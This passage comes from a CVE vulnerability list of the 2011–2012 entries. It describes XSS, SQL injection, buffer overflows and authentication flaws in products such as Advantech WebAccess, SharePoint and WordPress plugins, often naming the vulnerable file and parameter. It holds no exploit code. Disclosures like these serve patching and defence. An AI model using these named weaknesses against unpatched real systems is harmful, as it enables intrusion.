0xA or (2) 0xE Netscan packet. [CVE-2012-0244] Multiple SQL injection vulnerabilities in Advantech/BroadWin WebAccess before 7.0 allow remote attackers to execute arbitrary SQL commands via crafted string input. [CVE-2012-0243] Buffer overflow in an ActiveX control in bwocxrun.ocx in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary code by leveraging the ability to write arbitrary content to any pathname. [CVE-2012-0242] Format string vulnerability in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary code via format string specifiers in a message string. [CVE-2012-0241] Advantech/BroadWin WebAccess before 7.0 allows remote attackers to cause a denial of service (memory corruption) via a modified stream identifier to a function. [CVE-2012-0240] GbScriptAddUp.asp in Advantech/BroadWin WebAccess before 7.0 does not properly perform authentication, which allows remote attackers to execute arbitrary code via unspecified vectors. [CVE-2012-0239] uaddUpAdmin.asp in Advantech/BroadWin WebAccess before 7.0 does not properly perform authentication, which allows remote attackers to modify an administrative password via a password-change request. [CVE-2012-0238] Stack-based buffer overflow in opcImg.asp in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary code via unspecified vectors. [CVE-2012-0237] Advantech/BroadWin WebAccess before 7.0 allows remote attackers to (1) enable date and time syncing or (2) disable date and time syncing via a crafted URL. [CVE-2012-0236] Advantech/BroadWin WebAccess 7.0 and earlier allows remote attackers to obtain sensitive information via a direct request to a URL. NOTE: the vendor reportedly "does not consider it to be a security risk." [CVE-2012-0235] Cross-site request forgery (CSRF) vulnerability in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors. [CVE-2012-0234] SQL injection vulnerability in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to execute arbitrary SQL commands via a malformed URL. [CVE-2012-0233] Cross-site scripting (XSS) vulnerability in Advantech/BroadWin WebAccess before 7.0 allows remote attackers to inject arbitrary web script or HTML via a malformed URL. [CVE-2012-0232] Directory traversal vulnerability in rifsrvd.exe in the Remote Interface Service in GE Intelligent Platforms Proficy Real-Time Information Portal 2.6, 3.0, 3.0 SP1, and 3.5 allows remote attackers to modify the configuration via crafted strings. [CVE-2012-0225] Cross-site scripting (XSS) vulnerability in Invensys Wonderware Information Server 4.0 SP1 and 4.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-0220] Multiple cross-site scripting (XSS) vulnerabilities in the meta plugin (Plugin/meta.pm) in ikiwiki before 3.20120516 allow remote attackers to inject arbitrary web script or HTML via the (1) author or (2) authorurl meta tags. [CVE-2012-0209] Horde 3.3.12, Horde Groupware 1.2.10, and Horde Groupware Webmail Edition 1.2.10, as distributed by FTP between November 2011 and February 2012, contains an externally introduced modification (Trojan Horse) in templates/javascript/open_calendar.js, which allows remote attackers to execute arbitrary PHP code. [CVE-2012-0203] Cross-site scripting (XSS) vulnerability in InfoSphere Metadata Workbench (MWB) 8.1 through 8.7 in IBM InfoSphere Information Server 8.1, 8.5 before FP3, and 8.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-0193] IBM WebSphere Application Server (WAS) 6.0 through 6.0.2.43, 6.1 before 6.1.0.43, 7.0 before 7.0.0.23, and 8.0 before 8.0.0.3 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. [CVE-2012-0191] The web container in IBM Lotus Expeditor 6.1.x and 6.2.x before 6.2 FP5+Security Pack does not properly perform access control for requests, which allows remote attackers to spoof a localhost request origin via crafted headers. [CVE-2012-0179] Double free vulnerability in tcpip.sys in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that binds an IPv6 address to a local interface, aka "TCP/IP Double Free Vulnerability." [CVE-2012-0156] DirectWrite in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly render Unicode characters, which allows remote attackers to cause a denial of service (application hang) via a (1) instant message or (2) web site, aka "DirectWrite Application Denial of Service Vulnerability." [CVE-2012-0147] Microsoft Forefront Unified Access Gateway (UAG) 2010 SP1 and SP1 Update 1 does not properly configure the default web site, which allows remote attackers to obtain sensitive information via a crafted HTTPS request, aka "Unfiltered Access to UAG Default Website Vulnerability." [CVE-2012-0146] Open redirect vulnerability in Microsoft Forefront Unified Access Gateway (UAG) 2010 SP1 and SP1 Update 1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a crafted URL, aka "UAG Blind HTTP Redirect Vulnerability." [CVE-2012-0145] Cross-site scripting (XSS) vulnerability in wizardlist.aspx in Microsoft Office SharePoint Server 2010 Gold and SP1 and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via JavaScript sequences in a URL, aka "XSS in wizardlist.aspx Vulnerability." [CVE-2012-0144] Cross-site scripting (XSS) vulnerability in themeweb.aspx in Microsoft Office SharePoint Server 2010 Gold and SP1 and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via JavaScript sequences in a URL, aka "XSS in themeweb.aspx Vulnerability." [CVE-2012-0132] Cross-site scripting (XSS) vulnerability in HP Business Availability Center (BAC) 9.01 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2012-0128] HP Onboard Administrator (OA) before 3.50 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. [CVE-2012-0108] Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Web. [CVE-2012-0107] Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote attackers to affect availability via unknown vectors related to Web. [CVE-2012-0106] Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Web. [CVE-2012-0104] Unspecified vulnerability in Oracle GlassFish Enterprise Server 3.0.1 and 3.1.1 allows remote attackers to affect availability via unknown vectors related to Web Container. [CVE-2012-0095] Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Web. [CVE-2012-0093] Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote attackers to affect integrity via unknown vectors related to Web. [CVE-2012-0092] Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote authenticated users to affect integrity via unknown vectors related to Web. [CVE-2012-0090] Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote authenticated users to affect integrity via unknown vectors related to Web. [CVE-2012-0086] Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote authenticated users to affect confidentiality via unknown vectors related to Web. [CVE-2012-0085] Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 7.5.2 and 10.1.3.5.1 allows remote attackers to affect integrity via unknown vectors related to Content Server. [CVE-2012-0084] Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 7.5.2, 10.1.3.5.1, 11.1.1.3, 11.1.1.4, and 11.1.1.5 allows remote authenticated users to affect integrity via unknown vectors related to Content Server. [CVE-2012-0083] Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 7.5.2, 10.1.3.5.1, 11.1.1.3, 11.1.1.4, and 11.1.1.5 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Search. [CVE-2012-0077] Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 9.2.4, 10.0.2, 10.3.3, 10.3.4, and 10.3.5 allows remote authenticated users to affect integrity, related to WLS-Console. [CVE-2012-0071] Unspecified vulnerability in the Oracle Imaging and Process Management component in Oracle Fusion Middleware 10.1.3.6.0 allows remote attackers to affect integrity via unknown vectors related to Web. [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script. [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter. [CVE-2012-0040] Cross-site scripting (XSS) vulnerability in modules/core/www/no_cookie.php in SimpleSAMLphp 1.8.1 and possibly other versions before 1.8.2 allows remote attackers to inject arbitrary web script or HTML via the retryURL parameter. [CVE-2012-0034] The NonManagedConnectionFactory in JBoss Enterprise Application Platform (EAP) 5.1.2 and 5.2.0, Web Platform (EWP) 5.1.2 and 5.2.0, and BRMS Platform before 5.3.1 logs the username and password in cleartext when an exception is thrown, which allows local users to obtain sensitive information by reading the log file. [CVE-2012-0017] Cross-site scripting (XSS) vulnerability in inplview.aspx in Microsoft SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via JavaScript sequences in a URL, aka "XSS in inplview.aspx Vulnerability." [CVE-2012-0012] Microsoft Internet Explorer 9 does not properly handle the creation and initialization of string objects, which allows remote attackers to read data from arbitrary process-memory locations via a crafted web site, aka "Null Byte Information Disclosure Vulnerability." [CVE-2012-0010] Microsoft Internet Explorer 6 through 9 does not properly perform copy-and-paste operations, which allows user-assisted remote attackers to read content from a different (1) domain or (2) zone via a crafted web site, aka "Copy and Paste Information Disclosure Vulnerability." [CVE-2011-5265] Cross-site scripting (XSS) vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter. NOTE: this has been disputed by a third party. [CVE-2011-5264] Cross-site scripting (XSS) vulnerability in lazyest-backup.php in the Lazyest Backup plugin before 0.2.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xml_or_all parameter. [CVE-2011-5263] Cross-site scripting (XSS) vulnerability in RetrieveMailExamples in SAP NetWeaver 7.30 and earlier allows remote attackers to inject arbitrary web script or HTML via the server parameter. [CVE-2011-5261] Cross-site scripting (XSS) vulnerability in serverreport.cgi in Axis M10 Series Network Cameras M1054 firmware 5.21 and earlier allows remote attackers to inject arbitrary web script or HTML via the pageTitle parameter to admin/showReport.shtml. [CVE-2011-5260] Cross-site scripting (XSS) vulnerability in SAP/BW/DOC/METADATA in SAP NetWeaver allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2011-5258] Multiple cross-site scripting (XSS) vulnerabilities in OrangeHRM before 2.6.11.2 allow remote attackers to inject arbitrary web script or HTML via the (1) uniqcode or (2) isAdmin parameter to index.php [CVE-2011-5257] Multiple cross-site scripting (XSS) vulnerabilities in the Classipress theme before 3.1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) twitter_id parameter related to the Twitter widget and (2) facebook_id parameter related to the Facebook widget. [CVE-2011-5256] Cross-site scripting (XSS) vulnerability in the tooltips in LimeSurvey before 1.91+ Build 11379-20111116, when viewing survey results, allows remote attackers to inject arbitrary web script or HTML via unknown parameters. [CVE-2011-5255] Multiple cross-site scripting (XSS) vulnerabilities in admin/login in X3 CMS 0.4.3.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) PATH_INFO, (2) username, or (3) password parameter. [CVE-2011-5252] Open redirect vulnerability in Users/Account/LogOff in Orchard 1.0.x before 1.0.21, 1.1.x before 1.1.31, 1.2.x before 1.2.42, and 1.3.x before 1.3.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the ReturnUrl parameter. [CVE-2011-5251] Open redirect vulnerability in forum/login.php in vBulletin 4.1.3 and earlier allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter in a lostpw action. [CVE-2011-5228] Cross-site scripting (XSS) vulnerability in the Search module (quickstart/search) in appRain CMF 0.1.5 allows remote attackers to inject arbitrary web script or HTML via the ss parameter. [CVE-2011-5225] Cross-site scripting (XSS) vulnerability in wordpress_sentinel.php in the Sentinel plugin 1.0.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2011-5221] Cross-site scripting (XSS) vulnerability in the getLog function in svnlook.php in WebSVN before 2.3.1 allows remote attackers to inject arbitrary web script or HTML via the path parameter to (1) comp.php, (2) diff.php, or (3) revision.php. [CVE-2011-5220] Cross-site scripting (XSS) vulnerability in templates/default/Admin/Login.html in PHP-SCMS 1.6.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the lang parameter to index.php. [CVE-2011-5214] Multiple cross-site scripting (XSS) vulnerabilities in BrowserCRM 5.100.01 and earlier allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) index.php, (2) modules/admin/admin_module_index.php, or (3) modules/calendar/customise_calendar_times.php [CVE-2011-5211] Cross-site scripting (XSS) vulnerability in the poll module in Subrion CMS 2.0.4 allows remote attackers to inject arbitrary web script or HTML via the title field. NOTE: some of these details are obtained from third party information. NOTE: this might overlap CVE-2012-5452. [CVE-2011-5209] Cross-site scripting (XSS) vulnerability in search/ in GraphicsClone Script, possibly 1.11, allows remote attackers to inject arbitrary web script or HTML via the term parameter. [CVE-2011-5207] Cross-site scripting (XSS) vulnerability in admin/OptionsPostsList.php in the TheCartPress plugin for WordPress before 1.1.6 before 2011-12-31 allows remote attackers to inject arbitrary web script or HTML via the tcp_name_post_XXXXX parameter. [CVE-2011-5206] Cross-site scripting (XSS) vulnerability in notes.php in Rapidleech before 2.3 rev42 SVN r399 allows remote attackers to inject arbitrary web script or HTML via the notes parameter. [CVE-2011-5205] Cross-site scripting (XSS) vulnerability in audl.php in Rapidleech 2.3 rev42 SVN r358, rev43 SVN r397, and earlier allows remote attackers to inject arbitrary web script or HTML via the links parameter. [CVE-2011-5204] Akiva WebBoard 8.x stores passwords in plaintext, which allows local users to obtain sensitive information by reading from the database. [CVE-2011-5203] SQL injection vulnerability in WB/Default.asp in Akiva WebBoard before 8 SR 1 allows remote attackers to execute arbitrary SQL commands via the name parameter. NOTE: some of these details are obtained from third party information. [CVE-2011-5199] Cross-site scripting (XSS) vulnerability in sign.php in tinyguestbook allows remote attackers to inject arbitrary web script or HTML via the msg parameter. [CVE-2011-5194] Cross-site scripting (XSS) vulnerability in vendors/samswhois/samswhois.inc.php in the Whois Search plugin before 1.4.2.3 for WordPress allows remote attackers to inject arbitrary web script or HTML via the domain parameter, a different vulnerability than CVE-2011-5193. [CVE-2011-5193] Cross-site scripting (XSS) vulnerability in vendors/samswhois/samswhois.inc.php in the Whois Search plugin 1.4.2.3 for WordPress, when the WHOIS widget is enabled, allows remote attackers to inject arbitrary web script or HTML via the domain parameter to index.php, a different vulnerability than CVE-2011-5194. [CVE-2011-5192] Cross-site scripting (XSS) vulnerability in pretty-bar.php in Pretty Link Lite plugin before 1.5.6 for WordPress allows remote attackers to inject arbitrary web script or HTML via the slug parameter, a different vulnerability than CVE-2011-5191. [CVE-2011-5191] Cross-site scripting (XSS) vulnerability in pretty-bar.php in Pretty Link Lite plugin before 1.5.4 for WordPress allows remote attackers to inject arbitrary web script or HTML via the slug parameter, a different vulnerability than CVE-2011-5192. [CVE-2011-5190] Multiple cross-site scripting (XSS) vulnerabilities in Social Book Facebook Clone 2010 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO parameter to (1) signup.php, (2) lostpass.php, (3) login.php, (4) index.php, (5) help_tos.php, (6) help_contact.php, or (7) help.php. [CVE-2011-5189] Cross-site scripting (XSS) vulnerability in the Webform Validation module 6.x-1.x before 6.x-1.5 and 7.x-1.x before 7.x-1.1 for Drupal allows remote authenticated users with permissions to "update Webform nodes" to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-5188] Cross-site scripting (XSS) vulnerability in the Support Timer module 6.x-1.x before 6.x-1.4 for Drupal allows remote authenticated users with the "track time spent" permission to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-5187] Cross-site scripting (XSS) vulnerability in the Support Ticketing System module 6.x-1.x before 6.x-1.7 for Drupal allows remote authenticated users with the "administer support projects" permission to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-5186] Cross-site scripting (XSS) vulnerability in jbshop.php in the jbShop plugin for e107 7 allows remote attackers to inject arbitrary web script or HTML via the item_id parameter. [CVE-2011-5185] Cross-site scripting (XSS) vulnerability in video_comments.php in Online Subtitles Workshop before 2.0 rev 131 allows remote attackers to inject arbitrary web script or HTML via the comment parameter. [CVE-2011-5184] Multiple cross-site scripting (XSS) vulnerabilities in HP Network Node Manager i 9.10 allow remote attackers to inject arbitrary web script or HTML via the (1) node parameter to nnm/mibdiscover [CVE-2011-5183] Multiple SQL injection vulnerabilities in OrderSys 1.6.4 and earlier allow remote attackers to execute arbitrary SQL commands via the where_clause parameter to (1) index.php, (2) index_long.php, or (3) index_short.php in ordering/interface_creator/. [CVE-2011-5182] DISPUTED Cross-site scripting (XSS) vulnerability in lanoba-social-plugin/index.php in the Lanoba Social plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the action parameter. NOTE: the vendor disputes this issue, stating "Lanoba's plug in does sanitize user input, and because that input is never sent to the browser, an attacker has no way of executing script or code on a user's behalf." [CVE-2011-5181] Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. NOTE: some of these details are obtained from third party information. [CVE-2011-5180] Cross-site scripting (XSS) vulnerability in wp-1pluginjquery.php in the ZooEffect plugin 1.01 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. NOTE: some of these details are obtained from third party information. NOTE: this has been disputed by a third party. [CVE-2011-5179] Cross-site scripting (XSS) vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. [CVE-2011-5178] Multiple cross-site scripting (XSS) vulnerabilities in netmri/config/userAdmin/login.tdf in Infoblox NetMRI 6.0.2.42, 6.1.2, 6.2.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) eulaAccepted or (2) mode parameter. [CVE-2011-5177] Multiple cross-site scripting (XSS) vulnerabilities in admin/controller.php in eSyndiCat Pro 2.3.05 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to the admins (2) blocks, (3) articles, or (4) suggest-category [CVE-2011-5176] Multiple cross-site scripting (XSS) vulnerabilities in search.php in Banana Dance, possibly B.1.5 and earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) q or (2) category parameter. [CVE-2011-5160] Cross-site scripting (XSS) vulnerability in setup.php in OpenEMR 4 allows remote attackers to inject arbitrary web script or HTML via the site parameter. [CVE-2011-5159] Cross-site scripting (XSS) vulnerability in admin/configuration.php in Geeklog before 1.7.1sr1 allows remote attackers to inject arbitrary web script or HTML via the sub_group parameter, a different vulnerability than CVE-2011-4942. [CVE-2011-5150] Multiple cross-site scripting (XSS) vulnerabilities in SpamTitan 5.07 and possibly earlier allow remote attackers or authenticated users to inject arbitrary web script or HTML via the (1) ipaddress or (2) domain parameter to setup-network.php, different vectors than CVE-2011-5149. NOTE: the provenance of this information is unknown [CVE-2011-5149] Multiple cross-site scripting (XSS) vulnerabilities in SpamTitan 5.08 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) testaddr or (2) testpass parameter to auth-settings.php [CVE-2011-5147] Static code injection vulnerability in ajax_save_name.php in the Ajax File Manager module in the tinymce plugin in FreeWebshop 2.2.9 R2 and earlier allows remote attackers to inject arbitrary PHP code into data.php via the selected document, as demonstrated by a call to ajax_file_cut.php and then to ajax_save_name.php. [CVE-2011-5143] Multiple cross-site scripting (XSS) vulnerabilities in Open Business Management (OBM) 2.3.20 and probably earlier allow remote attackers to inject arbitrary web script or HTML via the (1) tf_name, (2) tf_delegation, and (3) tf_ip parameters to index.php. NOTE: the provenance of this information is unknown [CVE-2011-5142] Multiple cross-site scripting (XSS) vulnerabilities in Open Business Management (OBM) 2.4.0-rc13 and probably earlier allow remote attackers to inject arbitrary web script or HTML via the (1) tf_delegation, (2) tf_ip, or (3) tf_name parameter in a search action to host/host_index.php [CVE-2011-5138] Cross-site scripting (XSS) vulnerability in member.php in tForum b0.915 allows remote attackers to inject arbitrary web script or HTML via the username parameter in a viewprofile action. [CVE-2011-5132] Cross-site scripting (XSS) vulnerability in MyBB before 1.6.5 allows remote attackers to inject arbitrary web script or HTML via vectors related to "usernames via AJAX." [CVE-2011-5128] Multiple cross-site scripting (XSS) vulnerabilities in the Adminimize plugin before 1.7.22 for WordPress allow remote attackers to inject arbitrary web script or HTML via the page parameter to (1) inc-options/deinstall_options.php, (2) inc-options/theme_options.php, or (3) inc-options/im_export_options.php, or the (4) post or (5) post_ID parameters to adminimize.php, different vectors than CVE-2011-4926. [CVE-2011-5125] Cross-site scripting (XSS) vulnerability in Blue Coat Director before 5.5.2.3 allows remote attackers to inject arbitrary web script or HTML via vectors involving the HTTP TRACE method. [CVE-2011-5115] Cross-site scripting (XSS) vulnerability in DLGuard, possibly 4.6 and earlier, allows remote attackers to inject arbitrary web script or HTML via the searchCart parameter to index.php. [CVE-2011-5114] Multiple cross-site scripting (XSS) vulnerabilities in the Authoritative DNS - DNS Zones page in Barracuda Link Balancer 330 Firmware 1.3.2.005 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) zoneid or (2) scope parameter. [CVE-2011-5111] Multiple SQL injection vulnerabilities in Kajian Website CMS Balitbang 3.x allow remote attackers to execute arbitrary SQL commands via the hal parameter to (1) the data module in alumni.php [CVE-2011-5109] Multiple SQL injection vulnerabilities in Freelancer calendar 1.01 and earlier allow remote attackers to inject arbitrary web script or HTML via the SearchField parameter in a search action to (1) category_list.php, (2) Copy_of_calendar_list.php, (3) customer_statistics_list.php, (4) customer_list.php, and (5) task_statistics_list.php in the worldcalendar directory. [CVE-2011-5108] Cross-site scripting (XSS) vulnerability in config.php in AdaptCMS 2.0.0 and 2.0.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-5107] Cross-site scripting (XSS) vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter. [CVE-2011-5106] Cross-site scripting (XSS) vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2011-5105] Multiple cross-site scripting (XSS) vulnerabilities in EmployeeSearch.cc in ZOHO ManageEngine ADSelfService Plus 4.5 Build 4521 allow remote attackers to inject arbitrary web script or HTML via the (1) searchType and (2) searchString parameters, a different vulnerability than CVE-2010-3274. [CVE-2011-5104] Cross-site scripting (XSS) vulnerability in wpsc-admin/display-sales-logs.php in WP e-Commerce plugin 3.8.7.1 and possibly earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the custom_text parameter. NOTE: some of these details are obtained from third party information. [CVE-2011-5088] The GENESIS32 IcoSetServer ActiveX control in ICONICS GENESIS32 9.21 and BizViz 9.21 configures the trusted zone on the basis of user input, which allows remote attackers to execute arbitrary code via a crafted web site, related to a "Workbench32/WebHMI component SetTrustedZone Policy vulnerability." [CVE-2011-5086] https50.ocx in IPWorks! SSL in the server in Unitronics UniOPC before 2.0.0 does not properly implement an unspecified function, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted web site. [CVE-2011-5084] Cross-site scripting (XSS) vulnerability in Movable Type 4.x before 4.36 and 5.x before 5.05 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-5082] Cross-site scripting (XSS) vulnerability in the s2Member Pro plugin before 111220 for WordPress allows remote attackers to inject arbitrary web script or HTML via the s2member_pro_authnet_checkout[coupon] parameter (aka Coupon Code field). [CVE-2011-5081] Cross-site scripting (XSS) vulnerability in RestoreFile.pm in BackupPC 3.1.0, 3.2.1, and possibly other earlier versions allows remote attackers to inject arbitrary web script or HTML via the share parameter in a RestoreFile action to index.cgi. [CVE-2011-5080] Cross-site scripting (XSS) vulnerability in lib/class.tx_jftcaforms_tceFunc.php in the Additional TCA Forms (jftcaforms) extension before 0.2.1 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2011-5079] Open redirect vulnerability in the Modern FAQ (irfaq) extension 1.1.2 and other versions before 1.1.4 for TYPO3 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL, probably in the "return url parameter." [CVE-2011-5073] Multiple cross-site scripting (XSS) vulnerabilities in Support Incident Tracker (aka SiT!) before 3.65 allow remote attackers to inject arbitrary web script or HTML via the (1) mode parameter to contact_support.php [CVE-2011-5070] Multiple cross-site scripting (XSS) vulnerabilities in Support Incident Tracker (aka SiT!) 3.65 allow remote attackers to inject arbitrary web script or HTML via (1) the file name to incident_attachments.php [CVE-2011-5066] The SibRaRecoverableSiXaResource class in the Default Messaging Component in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.41 does not properly handle a Service Integration Bus (SIB) dump operation involving the First Failure Data Capture (FFDC) introspection code, which allows local users to obtain sensitive information by reading the FFDC log file. [CVE-2011-5065] Cross-site scripting (XSS) vulnerability in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.41 allows remote attackers to inject arbitrary web script or HTML via vectors related to web messaging. [CVE-2011-5058] The CmbWebserver.dll module of the Control service in 3S CoDeSys 3.4 SP4 Patch 2 allows remote attackers to create arbitrary directories under the web root by specifying a non-existent directory using \ (backslash) characters in an HTTP GET request. [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor." [CVE-2011-5052] Stack-based buffer overflow in CoCSoft Stream Down 6.8.0 allows remote web servers to execute arbitrary code via a long response to a download request. [CVE-2011-5051] Multiple unrestricted file upload vulnerabilities in the WP Symposium plugin before 11.12.24 for WordPress allow remote attackers to execute arbitrary code by uploading a file with an executable extension using (1) uploadify/upload_admin_avatar.php or (2) uploadify/upload_profile_avatar.php, then accessing it via a direct request to the file in an unspecified directory inside the webroot. [CVE-2011-5048] Multiple cross-site scripting (XSS) vulnerabilities in IBM Web Experience Factory (aka WEF, formerly WebSphere Portlet Factory) 7.0 and 7.0.1 allow remote attackers to inject arbitrary web script or HTML via a (1) text INPUT element or (2) TEXTAREA element, related to an interaction between Smart Refresh and Dojo. [CVE-2011-5047] Cross-site scripting (XSS) vulnerability in status_rrd_graph.php in pfSense before 2.0.1 allows remote attackers to inject arbitrary web script or HTML via the style parameter. [CVE-2011-5046] The Graphics Device Interface (GDI) in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted data, as demonstrated by a large height attribute of an IFRAME element rendered by Safari, aka "GDI Access Violation Vulnerability." [CVE-2011-5045] Cross-site scripting (XSS) vulnerability in details_view.php in PHP Booking Calendar 10e allows remote attackers to inject arbitrary web script or HTML via the page_info_message parameter. [CVE-2011-5042] Cross-site scripting (XSS) vulnerability in inc/lib/lib.base.php in SASHA 0.2.0 allows remote attackers to inject arbitrary web script or HTML via the instructors parameter. NOTE: the original disclosure also mentions the section_title parameter, but this was disputed by the vendor and retracted by the original researcher. [CVE-2011-5041] Multiple cross-site scripting (XSS) vulnerabilities in Pulse Pro CMS 1.7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) d parameter in a blocks action and (2) post_id parameter in an edit-post action to index.php. [CVE-2011-5040] Multiple cross-site scripting (XSS) vulnerabilities in Infoproject Biznis Heroj allow remote attackers to inject arbitrary web script or HTML via the config parameter to (1) nalozi_naslov.php and (2) widget.dokumenti_lista.php. [CVE-2011-5031] Multiple SQL injection vulnerabilities in servlet/capexweb.parentvalidatepassword in cApexWEB 1.1 allow remote attackers to execute arbitrary SQL commands via the (1) dfuserid and (2) dfpassword parameters. NOTE: some of these details are obtained from third party information. [CVE-2011-5030] Cross-site scripting (XSS) vulnerability in the Meta tags quick module 7.x-2.x before 7.x-2.3 for Drupal allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via unspecified vectors, probably related to "names of entity bundles." [CVE-2011-5029] Multiple cross-site scripting (XSS) vulnerabilities in Simple PHP Blog 0.7.0 and possibly earlier allow remote attackers to inject arbitrary web script or HTML via the (1) entry parameter to delete.php or (2) category parameter to index.php. [CVE-2011-5027] Cross-site scripting (XSS) vulnerability in ZABBIX before 1.8.10 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the profiler. [CVE-2011-5026] Cross-site scripting (XSS) vulnerability in the addPost function in data/functions.php in Winn GuestBook before 2.4.8d allows remote attackers to inject arbitrary web script or HTML via the name parameter to index.php. NOTE: some of these details are obtained from third party information. [CVE-2011-5025] Multiple cross-site scripting (XSS) vulnerabilities in the wiki application in Yaws 1.88 allow remote attackers to inject arbitrary web script or HTML via (1) the tag parameter to editTag.yaws, (2) the index parameter to showOldPage.yaws, (3) the node parameter to allRefsToMe.yaws, or (4) the text parameter to editPage.yaws. [CVE-2011-5024] Cross-site scripting (XSS) vulnerability in mmsearch/design in the Mailman/htdig integration patch for Mailman allows remote attackers to inject arbitrary web script or HTML via the config parameter. [CVE-2011-5023] Cross-site scripting (XSS) vulnerability in Pligg CMS 1.1.4 allows 